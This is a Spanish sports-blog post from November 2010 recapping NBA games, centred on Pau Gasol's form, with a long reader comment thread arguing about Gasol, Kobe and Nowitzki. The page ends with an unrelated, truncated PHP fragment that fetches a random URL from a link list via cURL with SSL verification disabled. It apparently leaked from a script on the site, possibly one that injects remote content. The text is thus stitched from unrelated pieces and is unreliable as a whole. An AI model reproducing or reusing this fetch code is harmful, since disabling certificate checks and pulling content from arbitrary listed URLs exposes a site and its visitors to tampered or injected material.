La Crónica (07/11/2010)

08 de November de 2010 por TheDeerHunter

Es increíble. Uno no puede menos que frotarse los ojos cuando se tira a la cara las portadas de los medios americanos con Gasol omnipresente y especulando con la posibilidad de batir las 72 de Jordan. Vídeos resumen donde se analiza cada jugada, casi cada gesto del español. Hace poco tiempo ya nos podíamos dar con un canto en los dientes si aparecía alguna vez.

Para celebrar el hito histórico de encabezar la tabla de eficiencia, los Lakers de Gasol (sin chauvinismos) se comieron a los Blazers, con el 16 amarillo en plan dictatorial en tan sólo 32 minutos de juego y Kobe permitiéndose el lujo de regular su recuperación (96-121). El resto del grupo apoteósicos. Da gusto ver la segunda unidad, con Blake, Barnes o Brown jugando tanto y tan bien como la primera. Bynum tendrá imposible sentar a Odom a este nivel. En Portland volvió y brilló Rudy. Fue de lo poco salvable, junto a Andre Miller y Batum. El desconcierto allí es mayúsculo.

Después el menú nos tenía preparados dos exquisitos duelos East vs West. Los Hawks perdieron la imbatibilidad contra unos Suns en su salsa (118-114). Childress volvió, vio y venció con Nash tocando la guitarra. Si se le subestima pasa lo que pasa, que no puedes con ellos ni con un partido monstruoso de Horford y Joe Jo. 6 tíos de los Suns en dobles figuras y todo dios mojando. En plan guateque que decía Andrés.

Los Celtics, a su rollo (92-83). Durant y los Thunder impotentes frente a la fortaleza del grupo. El año pasado, a los de Oklahoma City, les valía con lo que tenían. Con mayores exigencias ahora les falta precisamente lo que les sobra a los verdes: Profundidad y alternativas.

Por lo demás, los Rockets se estrenaron (94-120). Muy grave hubiera sido que no lo hicieran contra los Wolves, que son flojísimos. Los Pistons le inflingieron una cura de humildad a los Warriors (97-102) con Hamilton&Prince como hacía tiempo que no les veíamos. Villanueva menos “cancer” y Stuckey francamente bien liderando a su equipo. Bravo por los Pistons. Ya teníamos ganas de verles un partido digno.

Por último los Sixers asaltaron el Madison con la titularidad de Evan Turner sustituyendo a Iguodala (106-96). Mal partido de Wilson Chandler y Amaré demasiado solo.

PREMIOS

MVP: La fría estadística de la eficiencia dice que Pau Gasol es, a día de hoy, el mejor jugador de la liga. Estadística a parte, el nivel de forma que demuestra el catalán le coloca sin duda, en el TOP-5. Anoche, triple doble frente los Blazers. 20 puntos, 14 rebotes y 10 asistencias.

Rookie: Muy buena pinta tienen los 3 primeros del draft de este año. Anoche le tocó destacar a Evan Turner anotando 14 puntos y cogiendo 10 rebotes.

Sorpresa: Tras salir desde el banco en el anterior partido, Richard Hamilton celebró su titularidad con 27 puntos. ¿Quién dijo que estaba acabado?

Decepción: Brandon Roy habrá soñado esta noche con Ron Artest. El de los Lakers no le dejó respirar en ningún momento del partido secándolo completamente y permitiéndole anotar tan solo una canasta en juego para un total de 8 puntos. Cole Aldrich completa su quinto partido sin anotar ni un solo punto, tercero consecutivo.

Esfuerzo en vano: Al Horford anotó 30 puntos, capturó 10 rebotes, repartió 5 asistencias y puso un par de tapones. Joe Johnson anotó 34 puntos, recogió 7 rebotes y regaló 6 asistencias. Pues ni con esas se impusieron los Hawks a los Suns. Ver para creer.

Comenta

33 comentarios a esta entrada

  1. Txusma dice:
    #1

    Supongo q nadie me califacará de oportunista si digo que Gasol es el mejor jugador de la NBA en estos momentos. Lo dicen los fríos números y lo dicen las sensaciones que desprendre en la pista. Como bien apunta el artículo, en estos momento, son los Lakers de Gasol y es Kobe el que ejerce de escudero del catalán, si es que en la relación Kobe-Gasol es uno escudero del otro.
    Por otro lado, ¿llegará algún día el declve de Nash?¿Hasta q edad será capaz de seguir jugando a este nivel?

      Citar

  2. GreenPride dice:
    #2

    Paseo de los Lakers que siguen siendo muy superiores en sus partidos con un gran Gasol y todo el equipo jugando a gran nivel, banquillo incluido.
    Por otra parte, lección de experiencia y saber estar de los Celtics a los Thunder. Cuando se vieron más de 20 arriba se relajaron pero en cuanto se acercaron los Thunder volvieron a poner tierra de por medio. Muy bien el banquillo verde con Marquis, Nate, Big Baby e incluso Erden aportando mucho.

      Citar

  3. Denise dice:
    #3

    Zas, en toda la boca! . Eso es lo que estará diciendo en estos momentos el catalán a todos sus críticos. Sin duda alguna, a día de hoy, el mejor en su puesto con una diferencia abismal sobre el resto de Power forwards y Centers (con permiso de Howard).
    Sinceramente, no me sorprende el 7-0, ni las palizas de Lakers a sus rivales, el quinteto es el mismo que les ha hecho ganar 2 anillos consecutivos, y el banquillo mucho mejor con los pedazos de fichajes de Blakes y de Barnes (supongo que nadie me tachará de oportunista, llevo diciendo lo bueno que son Blake y Barnes desde siempre); y nivelazo el de Brown, de ése no me lo esperaba que jugase a este nivel.
    Alguien cree que Kobe está picado con el rendimiento de Pau, y su rendimiento normalito, o creeis que la éoca egoista de Kobe ya ha pasado a mejor vida?

      Citar

  4. Viva_Dirk dice:
    #4

    Txus yo no te tacho de oportunista pero no te doy la razón, no creo que sea el mejor jugador de la liga, y eso que he visto su exhibición de anoche, pero sus números no van a ser estos al final de la temporada. Kobe no esta a tope y no esta Bynum lo que favorece que el equipo juegue mas con el, que teniendo infinidad de recursos le lleva a hacer esos números. Los Lakers estan ahora mismo a un nivel superior, lo que hace falta es que lo mantengan en el momento importante.

      Citar

  5. Tiago dice:
    #5

    Como vuelva Bynum y dejen de darles balones a Pau es para pegarle un tiro a tito Phil

      Citar

  6. nacho dice:
    #6

    Txus, tú no eres oportunista, Denise tampoco. Pero el mamón de Gasol sí que lo es. Aprovecha que no está Bynum, y está renqueante Kobe para hacer lo que el equipo necesita. Pudiendo hacer menos y en vez de 7-0 estar 4-3. Hay que ver como es el pitufo, cuidado que hay un troll por ahí que se puede cabrear…
    En serio troll, yo también soy de los oportunistas, y me apunté al carro de Gasol, desde hace años. Nos hacemos GM y elige tú tu plantilla, que luego yo rodeo a Gasol con lo que me dejes. Firmo con los ojos cerrados. O pregunta aDoc Rivers si cambiaría a ojos cerrados a Garnett por Gasol. A día de hoy Lakers son favoritos y Celtics aspirantes, con ese cambio te digo yo que cambiarían las tornas.

      Citar

  7. Denise dice:
    #7

    ” Aprovecha que no está Bynum, y está renqueante Kobe para hacer lo que el equipo necesita. Pudiendo hacer menos y en vez de 7-0 estar 4-3″
    Jajaj, grandisima ironía.

      Citar

  8. Txusma dice:
    #8

    A ver Viva. Yo he dicho q a día de hoy Gasol es el mejor jugador de la NBA. No he dicho en ningún momento que vaya a acabar la temporada a este nivel, pero si hoy tuviera que elegir un MVP de la temporada ese sería, sin duda, Pau Gasol.

      Citar

  9. TheDeerHunter dice:
    #9

    Si sus números (y más que números su juego) fueran los actuales toda la liga, ¿crees que sería MVP y mejor jugador de la liga, Viva? No tengo ni la más mínima duda.
    Eso sí… ni creo que los pueda mantener ni creo que los Lakers mantengan demasiado tiempo este ritmo ni con las adiciones del mejor Kobe y de un Bynum sano. Ni siquiera que sea lo deseable para el equipo ni que Tito Phil lo permita.
    Quizás para los Bulls de Jordan no afectara ir tan sobrados, para un equipo con tanta tendencia a dejarse llevar como los amarillos andar cerca un hipotético récord sería contraproducente de cara al título.

      Citar

  10. kantonyo dice:
    #10

    Pues reafirmandome en lo que dije unos dias con los datos que puse. Que Gasol haga estos números no dependen de él ni de su talento, depende que le dejen ejercer esta responsabilidad. Mientras que el equipo funcione de esta manera con Gasol así, no debe haber problema. Además Bryant será sin duda más determinante en los momentos decidivos y en playoffs. Nunca a Gasol le dejaron jugar de esta forma, ni siquiera en Memphis.

    Por cierto, felicito a Denise por descubrirme a Barnes, empecé a fijarme gracias a sus continuos comentarios el año pasado sobre él y he de decir que me parece un pedazo jugador de equipo. En cuanto a Blake, no puedo decir lo mismo, no me parece más que un buen tercer o cuarto suplente, bastante irregular.

      Citar

  11. Scriers dice:
    #11

    Totalmente de acuerdo. Este equipo tiene que bajar pronto el pie del acelerador porque no tiene fortaleza mental cuando va tan sobrado. Se dispersa y tal… y ya hace dos años casi les cuesta un disgusto contra, por ejemplo, houston rockets. Así que este año algunos partidos perdidos y a por el tercero consecutivo.

      Citar

  12. Viva_Dirk dice:
    #12

    Sin duda con estos números es candidato Nº1 a MVP y solo podria discutirselo Chris Paul. Lo que digo es que no es el mejor jugador de la liga por hacer estos u otros números. Hay jugadores mejores que el por muy superiores que sean los Lakers a sus rivales y eso de facilidades a todos los jugadores de la plantilla, y como Gasol ya de por si es muy bueno, con eso sus números aumentan pero no le convierte en mejor jugador que nadie.

      Citar

  13. TheDeerHunter dice:
    #13

    Primero que Gasol no es de lejos sólo números (como algún otro que yo me sé)
    Segundo que si alguien es mejor que es (que podríamos estar de acuerdo) que lo demuestre. Primero con números y después con lo que no son números. Lo que hay otros mejores por decreto ley me suena a mitomanía y a forofismo. ¿Son Howard, Stoudamire, Melo mejores que Gasol ahora mismo? ya me diréis porqué.
    Tercero, el ha estado tapado mucho tiempo, infravalorado y criticado hasta el cainismo y es justo que le reconozcamos como mínimo lo que a otros (por los números en la mano, precisamente, como a esos otros)
    Cuarto, es tan bueno como cualquier otro. Y en muchos casos lo ha demostrado. Yo le he visto tocarle la cara a Nowitzki, Howard… y el resto de grandes interiores más de una y más de dos.
    Quinto, juega fuera de su posición. Y Odom no es precísamente un buldozer interior. Con lo cual tiene todavía mucho más mérito lo que está haciendo.

      Citar

  14. Denise dice:
    #14

    @kantonyo: Gracias, sobre Blake discrepo, es cierto que no es el tipico base puro, de crear y repartir juego, pero para lo que lo quieren los Lakers, está perfecto, sube el balón hasta medio campo sin perderlo, se coloca en la linea de tres, y cuando el Kobe/Odom/Gasol le hagan un 2×1, balón para Blake, y triple que se casca.
    Atrás, defiende relativamente bien, y no tiene pinta de dar problemas en los vestuarios, parece buen chico.
    Compara a Blake con Farmar….
    Sobre Barnes, de acuerdo contigo, pedazo jugador de equipo, a veces se le va la olla, pero cada año parece más maduro: hasta llegar a los Warriors, anteriormente fue despreciado por multitud de equipos, a veces también entrando en traspasos para cuadrar salarios, con los GSW lo hizo fenomenal, con los Suns se salió, y el año pasado se marcó un temporadón (dentro de su rol).

    Tristemente para mí, Gasol se comió a Howard tanto en ataque como en defensa en las Finales, desde entonces, respeto aún más al catalán. Y no comparar a Gasol con Stoudemire, por favor….., si Howard o amare tuvieran el físico de Gasol, no se coemrían un pimiento. Gasol es buenísimo por su calidad, los otros 2 gracias sobre todo a un fisico privilegiado.

      Citar

  15. Viva_Dirk dice:
    #15

    @Deer
    1.- Completamente deacuerdo, lo mas grande de Gasol no son los números.
    2.- Si los hay mejores que el aunque sus equipos no sean tan buenos, para mi ninguno de los 3 que has nombrado hasta estado nunca claramente por encima de Gasol. Pero con Kobe no admite discusión y como jugador franquicia tampoco la ha soportado con otros, por ejemplo Wade.
    3.- ¿Ha estado tapado porque? Lleva 3 años y pico en el equipo mas mediatico y se le ha reconocido, de hecho hasta llegar a los Lakers nunca habia entrado en los mejores quintetos de la temporada ni habia sido All-Star con tanta naturalidad. Y en Memphis desde que se fue Brown hasta que llegó Gay fue jugador franquicia indiscutible haciendo grandes temporadas, que el equipo no diese para mas no hace que le valore menos(como el actual equipo no hace que le valore mas) y aun así ya fue reconocido como All-Star, y en aquel entonces ese era su sitio.
    4.- Desde que llegó a los Lakers su defensa ha mejorado y su actitud también, y si puntualmente es tan bueno como cualquiera. Su actual momento esta dentro de un equipo que esta muy por encima del resto, en gran parte gracias a el sin duda, pero no podemos perder de vista eso, Gasol no es el centro de las defensas,cuenta con el mejor jugador en la pista y el mejor entrenador en el banco. A esos que dices que ha tocado la cara lo ha hecho con los Lakers, con Memphis tocó menos caras.
    5.- Jugar de 5 le supone casi siempre mayores ventajas ya que las posiciones de center son mucho mas débiles que las de ala-pivot de largo, y Odom no es un buldozer pero esta en 11 rebotes(como Gasol), un 63% en tiros de campo,un 9 de 13 en triples y es un excelente pasador, hablamos de largo del mejor Odom de su carrera igual que del mejor Pau, ambos favorecidos por un equipo que esta funcionando muy por encima del resto.

    Para mi Gasol desde hace 6 años es un top-20 de la liga, sin duda desde que llegó a los Lakers y habiendo ganado 2 anillos su caché ha subido y además otros grandes jugadores ya no son lo que eran, en un gran momento como este hay que disfrutar de el, pero si yo tuviera que elegir 10 tios para ganar anillos durante los 2 o 3 próximos años no creo que Gasol estuviese en el top10, ni en el mio ni en el de la mayoría. Dentro del engranaje de los Lakers vemos a un Gasol sobrado y posiblemente ningun interior sea tan adecuado para el triangulo como el en la liga, pero hay que tener perspectiva y mirar con lo que cuentan otros y lo que hacen con ello como jugadores franquicia, cosa que Gasol no es por mas vueltas que le deis.

      Citar

  16. nacho dice:
    #16

    Yo, Viva, por más vueltas que le doy, hoy por hoy solo conozco a un jugador franquicia capaz de ganar un anillo él solo, y aún así lo dudo. Es Kobe, y lo últimos los ha ganado bien acompañado. Wade fue hace años con Shaquille al lado. Nowitki fracasó, como LeBron. Aún es pronto para Durant. Duncan es la hostia, pero mira lo que tenía al lado. Los Celtics han sido un verdadero equipo en su anillo. No lo se, le doy vueltas, intento poner perspectiva y realmente no veo a Gasol como un jugador determinante, pero sí imprescindible. No se va a jugar la última bola, ¿y qué?. Ah! y tampoco me vale que sea un secarral el puesto de 5 para quitarle méritos. Como 4, a día de hoy es más determinante que todos los demás, sí, incluido Dirk. Y además como cuatro asume tareas defensivas que otros ya quisieran, o si no se lo preguntamos a Howard. ¿Quién era determinante Malone o Stockton? Desde que llegó a LA, una final, dos anillos, veremos que más y se habla de Kobe-Gasol (vale que el nuestro en segundo plano) pero no se habla de Kobe como se hablaba de Jordan (y mira lo que tenía este al lado) Ah!, y lo logrado con Menphis es la hostia, nunca tuvo lo que Anthony o el alemán al lado, pero vamos ni cerquita estuvo. Pon a Gasol en los Menphis de hoy, y dan miedo. (y tampoco son la caña, salvo que Gay siga empeñado en callarme la boca)

      Citar

  17. TheDeerHunter dice:
    #17

    2- No soy sospechoso. Efectivamente creo que tanto el mejor Kobe, como el mejor Wade y algún otro son/han sido/serán superiores a Gasol. Hablamos de este preciso instante, con un Gasol en estado de gracia y tanto Kobe como Wade con problemas de diversa índole. Ni uno ni otro están siendo mejores que Gasol. Y quien tiene a unos y otros en sus respectivas ligas fantásticas estará de acuerdo conmigo. Ojo… que desde que le pusimos a caldo, Howard también está como un toro. El resto… CP3 no está tan fuerte y Rondo lo mismo. Y estos 4 están siendo los mejores.
    3- Pues fíjate… que hasta los playoffs tan brillantes que hizo como en las finales estuvo tapado por un Kobe irregular. Hablas de jugador franquicia indiscutible y en hace nada kantonyo nos mostró su promedio histórico de tiros, incompatible con ser eso de “indiscutible” como tú dices. Que Jason Williams, Drew Gooden, Lorenzen Wright, Bonzi Wells, Mike Miller… o incluso Posey lanzaran tan sólo dos o tres tiros menos que él durante esa época lo dice todo. Cuando llegó Gay ya sabemos por quién se apostó.
    4- Gasol es tan centro de las defensas como centro de los ataques. Mucho de lo que logra se lo trabaja él solito y en muchas fases de la temporada ya sabemos lo que trabaja el equipo para él. Más mérito tiene lo que logra. Y sí, en Memphis él tocó muchas caras a los más grandes. A Garnett o Duncan, recuerdo partidos sublimes… lo mismo que Garnett las tocó en Minnesotta a mucha gente. Quien no las tocó allí fueron otros. Individualmente podemos objetar pequeños detalles. E insisto que en esa época sí pondría a bastantes jugadores por delante de él. No lo discuto.
    5.- Creo más que el equipo está funcionando por encima del resto gracias al extraordinario rendimiento de Gasol y Odom que al revés. Y en ningún caso creo que jugar de 5 le beneficie. Creo que le desgasta más en cualquier caso, y más con Odom al lado por muy estratosférico que esté. Tampoco creo que le beneficia jugar 40 minutos, por cierto…

    Sí, sí… muchos elegirán a gente como Melo o como Howard por delante. Incluso a Durant que parecía que este año se iba a comer el mundo… O a LeBron que es el monstruo del milenio. Veremos cuantos anillos se llevan y cómo de importantes son en lograrlos. De momento Gasol 2 fundamental en los dos. Tan fundamental como lo era Kobe en la era Shaq y ya sabes lo que yo opino de eso. Gasol ya es un mito en un lugar tan complicado como L.A. donde muchos se hubieran hecho cacas tras la primera andanada de capones que se llevó. Pero para muchos aquí sigue siendo un secundario. Esa historia me la conozco.

      Citar

  18. TheDeerHunter dice:
    #18

    @Nacho… ¿Y Nowitzki ha estado solo??? ahora me entero

      Citar

  19. nacho dice:
    #19

    Yo no he dicho que haya estado solo, ni de lejos, igual me he explicado mal

      Citar

  20. TheDeerHunter dice:
    #20

    Lo decía porque como has hablado de que Nowitzki o LeBron fracasaron, en el contexto de ganar anillos ellos solos.
    Eso había entendido yo.

    Pero vamos, que en el resto de argumentos estoy absolutamente de acuerdo. A mí eso de la primera espada como excusa de tirar por tierra algunos grandes como Pippen, Havlicek, Cousy, el mismo Kobe, ¿Kareem??? Me suena de un absurdo que me caigo de la silla.
    Salvando ciertas distancias es exáctamente el mismo caso que lo que algunos enarbolan contra Gasol. Gasol en estos dos anillos ha sido casi tan importante como Kobe y en algún caso puntual hasta más.

      Citar

  21. Viva_Dirk dice:
    #21

    Poco mas que decir, si lo que decís es que Gasol es el jugador mas en forma, el que mejor ha empezado la temporada o el MVP si acabase hoy la liga, estoy deacuerdo. Pero si hablamos de ser mejor jugador que tal o cual, de poco me sirven 6 partidos donde Odom promedia 17-11 con porcentajes sobrehumanos, Barnes 9-6 en 20 minutos, Brown 10 puntos por encima del 50% tanto en tiros de campo como de 3 y así con el resto de los componentes de los Lakers, eso no demuestra que sea mejor que nadie.

    De Nowitzki, aunque ya lo halla dicho alguna que otra vez, llevó a la final a un equipo con un solo All-Star, el mismo.

      Citar

  22. Scriers dice:
    #22

    A gasol le va a hacer mucho bien el paso del tiempo ;). Para mi, si me dan a elegir hoy en dia 10 jugadores para mi equipo, el estaria seguro. Pensando sus cualidades y todos los que hay ahora… de verdad no se me ocurren muchos mas.

      Citar

  23. TheDeerHunter dice:
    #23

    Pobrecico Nowitzki… si es que con un enquipo de tan sólo 100 millones en salarios no se puede ir a ningún lado.
    Qué cachondo Viva… XD

      Citar

  24. TheDeerHunter dice:
    #24

    jojojo, lo que me acabo de dar cuenta y no me acordaba es que Mbenga y Josh Powell jugaban en aquel equipo!!!
    fíjate si hasta tenían campeones en sus filas!!!
    eso sí… jugaban aún menos que en los Lakers

      Citar

  25. Viva_Dirk dice:
    #25

    No he dicho ninguna mentira, ningun jugador de aquel equipo fue All-Star, y si quieres podemos hablar de como infrautilizaba Avery Johnson a Devin Harris o de que carreras han tenido después Josh Howard y Marquis Daniels. El tema del presupuesto no me lo vendas como que da un super equipo, porque ejemplos de lo contrario hay a patadas.

    Como jugador franquicia no existe comparación posible con varios jugadores. Eso si, para mi siempre estuvo muy por delante de ala-pivots como Stoudamire, Boozer o Bosh, antes y después de llegar a los Lakers.

      Citar

  26. TheDeerHunter dice:
    #26

    Lo que es incomparable es el nivel de equipo que ha disfrutado uno y otro durante toda su carrera.
    Véndeme tú lo que quieras con Harris o con el resto. Pero el único jugador franquicia que durante toda su carrera ha tenido grandes equipos detrás ha sido Nowitzki. Ni Kobe, ni Shaq, ni Garnett, ni Duncan, ni Nash, ni Pau… ninguno de los grandes de esta última década ha tenido año tras año los equipazos que ha disfrutado Dirk. Por eso me duele que le pintes como un pobre diablo golpeado por las circunstancias de la vida.
    Por cierto, Kobe en la final contra Boston tampoco tenía ningún all-star a su lado… pero nadie puso eso de excusa para poner a aquellos Lakers a caer de un burro en circunstancias mucho peores que aquellos Dallas.
    Excusas, excusas…

      Citar

  27. Lenny dice:
    #27

    Creo recordar que en la final contra Boston, Pau ya había sido AllStar…

      Citar

  28. scriers dice:
    #28

    Hombre, Gasol era ya all star, pues jugó estando en memphis. de todas formas nunca entendí esas megacríticas a Los Lakers esa temporada.

      Citar

  29. TheDeerHunter dice:
    #29

    No, Gasol no lo fue esa temporada.
    En los Dallas finalistas habían varios ex all-star y también futuros.

      Citar

  30. Txusma dice:
    #30

    Supongo q Viva se refiere a ex-All Star y en aquellos Mavs estaba Stackahouse q ya lo había sido y Josh Howard que lo fue posteriormente en 2007 y Devin Harris en 2009… Vamos, que unos mantas tampoco eran del todo.
    Lo curioso es q de los Lakers de la 2007-2008 (los q perdieron la final frente a Boston) aparte de Kobe estaba Gasol q había sido AllStar y lo siguió siendo y…. ya.

      Citar

  31. Viva_Dirk dice:
    #31

    Por eso para mi Kobe es mejor que Nowitzki y Gasol no lo es. Ya sabia yo que no serviria de nada, los Mavs nunca jamás han sido los máximos favoritos al anillo, y aquí acaban mis comentarios respecto a Nowitzki.

      Citar

  32. TheDeerHunter dice:
    #32

    Los Mavs han estado entre los máximos favoritos varios años, entre ellos el de la final.
    Desde luego que no fue ninguna sorpresa que llegaran a ella. Sí lo fue perderla y cuando cayeron contra los Warriors.
    La configuración de la plantilla y la ideología de la franquicia apuesta por otro modelo que otros. Y ese modelo ha sido el de contar con plantillas de superlujo todos los años. Ya les hubiera gustado a otros (básicamente a todos los que se han mencionado en la lista de los 10 mejores de la década)
    Lo de un par de all-stars es otra concepción completamente distinta que tiene sus ventajas y sus inconvenientes como bien sabemos todos… y no necesariamente se garantiza el éxito o justifica la derrota con un modelo u otro.
    Hemos visto equipos con 4 (¿o 5?) all stars que no se han comido un colín.

      Citar

  33. scriers dice:
    #33

    Ah, lo dices por la misma temporada. Pero en todos los foros y tal, cuando se habla de allstar es que ya lo has sido o eres, es decir, con que seas una vez ya eres all star. Al menos es el barómetro de la espn o de la página de la nba. ¿No? ¿Alguien sabe al respecto?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>